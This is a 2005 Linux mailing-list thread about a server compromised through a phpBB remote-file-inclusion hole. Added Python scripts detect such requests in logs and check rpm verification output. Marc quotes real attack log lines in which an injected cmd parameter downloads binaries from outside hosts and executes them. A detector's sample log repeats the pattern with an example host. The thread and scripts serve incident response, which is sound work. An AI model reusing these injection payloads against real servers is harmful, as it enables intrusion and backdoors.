[WBEL-users] Port information for 9865 and 44464

Plug N Play plugnplay at grandpacific.ph
Sun Jun 26 22:02:03 CDT 2005


Thank you for all your responses.

Yesterday, I identified the cause of the intrusion.
It's from my old PHP Nuke installation with the PHPBB module included.

I was very careless and unaware that PHPBB would be the source of
intrusion, since this module is not active on the server.

However, the hacker still managed to install the code and run it.
Here is the log I found.

Hacker-ip - - [14/Jun/2005:00:35:58 -0400] "GET /modules/Forums/admin/admin_styles.php?phpbb_root_path=http://www.segfaultbr.hpgvip.ig.com.br/tool25.gif?&cmd=cd%20/tmp;%20wget%20www.sn4ck3.com/44464;%20chmod%20777%2044464;%20./44464 HTTP/1.1" 200 9105
Hacker-ip - - [14/Jun/2005:00:36:31 -0400] "GET /modules/Forums/admin/admin_styles.php?phpbb_root_path=http://www.segfaultbr.hpgvip.ig.com.br/tool25.gif?&cmd=cd%20/tmp;wget%20http://www.ciget.com.ve/.0/bindz;%20chmod%20777%20bindz;./bindz HTTP/1.1" 200 9135
Hacker-ip - - [14/Jun/2005:00:37:01 -0400] "GET /modules/Forums/admin/admin_styles.php?phpbb_root_path=http://www.segfaultbr.hpgvip.ig.com.br/tool25.gif?&cmd=cd%20/tmp;%20wget%20paginas.terra.com.br/informatica/fdl/cgi;%20chmod%20777%20cgi;%20./cgi HTTP/1.1" 200 9209

Ok, from here, the hacker installed 3 malicious programs, namely
44464, bindz and cgi.

My question is, what harm will these three programs (44464, bindz and cgi)
do within my server?

I tried to locate them but they were gone and no longer listening on any
port.

Any information would be very much appreciated.

Thank you again,
Marc
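An added example, not part of Marc's message or of the WBEL thread, showing how requests like the three quoted above can be picked out of an Apache access log automatically. The script parses Common Log Format lines, percent-decodes the query string, flags any parameter that carries a remote URL (the phpbb_root_path include) or a shell command (the cmd parameter), and reports the basenames of whatever that command fetched, so a responder knows which dropped files to look for in /tmp. The log lines inside the script are constructed, modelled on the ones above, with documentation addresses and an example host in place of the real ones.

```python
"""Flag remote-file-inclusion and command-injection requests in an Apache access log."""
import re
from urllib.parse import unquote, urlsplit

# Common Log Format prefix (the combined format adds referer/agent after it):
# host ident user [time] "METHOD target PROTO" status size
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+|-)'
)

# A decoded query value that starts with, or chains (; & |) into, a
# download/permission/execute command is a shell command, not data.
SHELL_RE = re.compile(r"(?:^|[;&|\s])(?:(?:wget|curl|chmod|cd|perl|sh|bash)\s|\./)")

# Constructed sample lines, modelled on the requests quoted in the thread.
# Hosts are documentation addresses and an example name, not the
# infrastructure from the real log.
SAMPLE_LOG = [
    '203.0.113.5 - - [14/Jun/2005:00:35:58 -0400] "GET /modules/Forums/admin/admin_styles.php'
    '?phpbb_root_path=http://evil.example/tool.gif?&cmd=cd%20/tmp;%20wget%20evil.example/44464;'
    '%20chmod%20777%2044464;%20./44464 HTTP/1.1" 200 9105',
    '203.0.113.5 - - [14/Jun/2005:00:36:31 -0400] "GET /modules/Forums/admin/admin_styles.php'
    '?phpbb_root_path=http://evil.example/tool.gif?&cmd=cd%20/tmp;wget%20http://evil.example/.0/bindz;'
    '%20chmod%20777%20bindz;./bindz HTTP/1.1" 200 9135',
    '198.51.100.7 - - [14/Jun/2005:00:40:12 -0400] "GET /modules/Forums/viewtopic.php?t=42&start=0 HTTP/1.1" 200 5120',
    "garbage line that does not parse",
]


def split_query(query):
    """Split the raw query on '&' only and percent-decode each side.
    Deliberately not parse_qsl: older Pythons also split on ';', which
    would shred a cmd= payload into pieces."""
    pairs = []
    for chunk in query.split("&"):
        if chunk:
            name, _, value = chunk.partition("=")
            pairs.append((unquote(name), unquote(value)))
    return pairs


def dropped_files(command):
    """Basenames of whatever a wget/curl inside the command fetched;
    these are the names to look for on disk afterwards."""
    names = []
    for url in re.findall(r"\b(?:wget|curl)\s+(?:-\S+\s+)*(\S+)", command):
        names.append(url.rstrip("/;").rsplit("/", 1)[-1])
    return names


def analyze_line(line):
    """Return a finding dict for a suspicious request, None otherwise."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))  # path vs. query, split at the first '?'
    findings, dropped = [], []
    for name, value in split_query(parts.query):
        if re.match(r"(?i)^(?:https?|ftp)://", value):
            findings.append(f"remote URL in parameter {name!r}")
        if SHELL_RE.search(value):
            findings.append(f"shell command in parameter {name!r}")
            dropped.extend(dropped_files(value))
    if not findings:
        return None
    return {
        "host": m.group("host"),
        "time": m.group("time"),
        "path": parts.path,
        "status": int(m.group("status")),
        "findings": findings,
        "dropped": dropped,
    }


def scan_log(lines):
    """Apply analyze_line to every line and keep the hits."""
    return [hit for hit in map(analyze_line, lines) if hit]


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit["time"], hit["host"], hit["path"], hit["status"])
        for finding in hit["findings"]:
            print("   ", finding)
        if hit["dropped"]:
            print("    dropped files to look for:", ", ".join(hit["dropped"]))
```

To run it over a real file, pass the open file object to scan_log. The status code is the detail worth checking on every hit: a 200 on a request like this means the remote include was served and executed rather than rejected, which is exactly what the three entries above show.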

-----Original Message-----
From: whitebox-users-bounces at beau.org
[mailto:whitebox-users-bounces at beau.org] On Behalf Of Johnny Hughes
Sent: Friday, June 24, 2005 5:47 PM
To: WhiteBox Users
Subject: Re: [WBEL-users] Port information for 9865 and 44464

On Fri, 2005-06-24 at 01:50 -0700, Benjamin Smith wrote:
> I hafta admit: it doesn't look good. 
> 
> A few things to try: 
> 
> lsof | less 
> (look thru the list, see if anything jumps out at you. It's a LONG list) 
> 
> netstat -ln 
> (helps you see why the ports are open) 
> 
> Don't forget chkrootkit (google for it) 
> 
> Other things: do a `find / -iname \.\*` to find "dot" (hidden) files. Look
> thru /tmp closely. Look thru /var/log/messages, /var/log/httpd/error_log and
> any other HTTPD log files. If you can find out approx. when a compromise took
> place, use find with the "mtime" and "ctime" options to find any files
> created within a day or so of that initial hack.
> 
> More info from a honeypot project: 
> http://www.honeynet.org/scans/scan29/sol/ydjemaiel/Answers.html
> 
> Best of luck, 
> 
> -Ben 
> 
> 
> 
> On Friday 24 June 2005 01:32, Plug N Play wrote:
> > Dear WBL Users,
> > 
> > Greetings,
> > 
> > Today, I discovered two new high ports opened from my server. Port 9865
> > and 44464 are both opened and listening to outside. Would anyone happen to
> > know or have an idea that you can share regarding these two ports?
> > 
> > Also I tried to telnet them (telnet localhost 9865 or 44464) and it gives me
> > a (sh-2.05b$). Could this mean a hacker has set up a backdoor? Or am I
> > already compromised?
> > 
> > Any information would be very much appreciated.
> > 
> > Thank you,
> > Marc

If you telnet to the port and get a bash prompt, it is almost guaranteed
that you are hacked and have trojans listening on that port.

Use the command:

netstat -aptn

It will tell you the open ports and what program has them open.

It is possible that these ports will not show up if a rootkit has been
installed that replaces lsof (it will also show what program uses which
port) or netstat.

You can use the command:

rpm -Vv net-tools

and

rpm -Vv lsof

You should see 8 dots, a blank space (or c for a config file and d for
documentation), and all the files listed, similar to this (for lsof on
CentOS-4):

--------------------------------------------
[root at centosj i386]# rpm -Vv lsof
........    /usr/sbin/lsof
........    /usr/share/doc/lsof-4.72
........  d /usr/share/doc/lsof-4.72/00.README.FIRST
........  d /usr/share/doc/lsof-4.72/00.README.FIRST_4.72
........  d /usr/share/doc/lsof-4.72/00CREDITS
........  d /usr/share/doc/lsof-4.72/00DCACHE
........  d /usr/share/doc/lsof-4.72/00DIALECTS
........  d /usr/share/doc/lsof-4.72/00DIST
........  d /usr/share/doc/lsof-4.72/00FAQ
........  d /usr/share/doc/lsof-4.72/00LSOF-L
........  d /usr/share/doc/lsof-4.72/00MANIFEST
........  d /usr/share/doc/lsof-4.72/00PORTING
........  d /usr/share/doc/lsof-4.72/00QUICKSTART
........  d /usr/share/doc/lsof-4.72/00README
........  d /usr/share/doc/lsof-4.72/00TEST
........  d /usr/share/doc/lsof-4.72/00XCONFIG
........  d /usr/share/man/man8/lsof.8.gz
--------------------------------------------------------

If any of the dots are replaced with letters, something about that file
has changed since it was installed from the RPM ... see "man rpm" under
"Verify Options" for details.

Rootkits will replace executables with other ones that don't show the
rogue processes or ports as open ... also check here for ports tied to
specific threats:

http://isc.sans.org/

It is critical that all updates be done in a timely manner for all
internet facing machines ... or at least that you run a good iptables
firewall on internet facing machines that only allows connections that
are necessary.

-- Johnny Hughes
<http://www.CentOS.org>
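An added example, not part of Johnny's message or of rpm itself, that turns the `rpm -Vv` output described above into a short report. It parses the 8-character test column and the attribute column, decodes each failing letter according to the rpm man page, and separates changes that are normally expected (config files, documentation, an mtime-only change) from a plain binary whose size or digest no longer matches its package, or that is missing outright, which is what a replaced netstat or lsof looks like. The output it parses is constructed for the example; the modified and missing lines are invented, not taken from a real machine.

```python
"""Turn `rpm -Vv` output into a report of files that no longer match their package."""
import re

# The eight test columns rpm prints (see "man rpm", VERIFY OPTIONS).
# A dot means the test passed, a letter names the failing test, and
# "?" means the test could not be performed. "5" was the MD5 digest on
# rpm of this era; newer rpm reports a SHA-256 digest under the same letter.
FLAG_MEANING = {
    "S": "file size differs",
    "M": "mode (permissions or file type) differs",
    "5": "MD5 digest differs",
    "D": "device major/minor number differs",
    "L": "readlink path differs",
    "U": "owner differs",
    "G": "group differs",
    "T": "mtime differs",
}

# Attribute column: c = config file, d = documentation, g = ghost,
# l = license, r = readme. Changes to these are usually legitimate.
BENIGN_ATTRS = {"c", "d", "g", "l", "r"}

# Tests whose failure on a plain binary points at a replaced file rather
# than a touched timestamp.
STRONG_FLAGS = {"S", "M", "5", "L", "U", "G"}

LINE_RE = re.compile(
    r"^(?P<flags>[SM5DLUGT.?]{8}|missing)\s+(?P<attr>[cdglr])?\s*(?P<path>/\S+)\s*$"
)

# Constructed sample output in the layout shown in the thread.
SAMPLE_OUTPUT = """\
........    /usr/sbin/lsof
........  d /usr/share/doc/lsof-4.72/00README
.......T    /usr/share/man/man8/lsof.8.gz
S.5....T    /bin/netstat
S.5....T  c /etc/services
missing     /sbin/ifconfig
"""


def parse_verify(output):
    """Parse rpm -Vv lines into dicts; lines that don't fit the format are skipped."""
    records = []
    for line in output.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        flags = m.group("flags")
        missing = flags == "missing"
        failed = [] if missing else [f for f in flags if f in FLAG_MEANING]
        records.append({
            "path": m.group("path"),
            "attr": m.group("attr") or "",
            "missing": missing,
            "failed": failed,
            "problems": ["file is missing"] if missing
                        else [FLAG_MEANING[f] for f in failed],
        })
    return records


def suspicious(records):
    """Records worth a closer look: a non-config, non-doc file that is
    missing or fails one of the strong tests (size, digest, mode, ...)."""
    hits = []
    for r in records:
        if r["attr"] in BENIGN_ATTRS:
            continue
        if r["missing"] or STRONG_FLAGS.intersection(r["failed"]):
            hits.append(r)
    return hits


if __name__ == "__main__":
    for r in suspicious(parse_verify(SAMPLE_OUTPUT)):
        print(r["path"], "->", "; ".join(r["problems"]))
```

On a live system, feed it the output of `rpm -Vv net-tools lsof` (or `rpm -Va` for every installed package). The caveat Johnny makes still applies: the report is only as trustworthy as the rpm binary and its database on that host, so a changed core binary should be confirmed against a known-good copy of the package rather than taken on the host's word alone.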



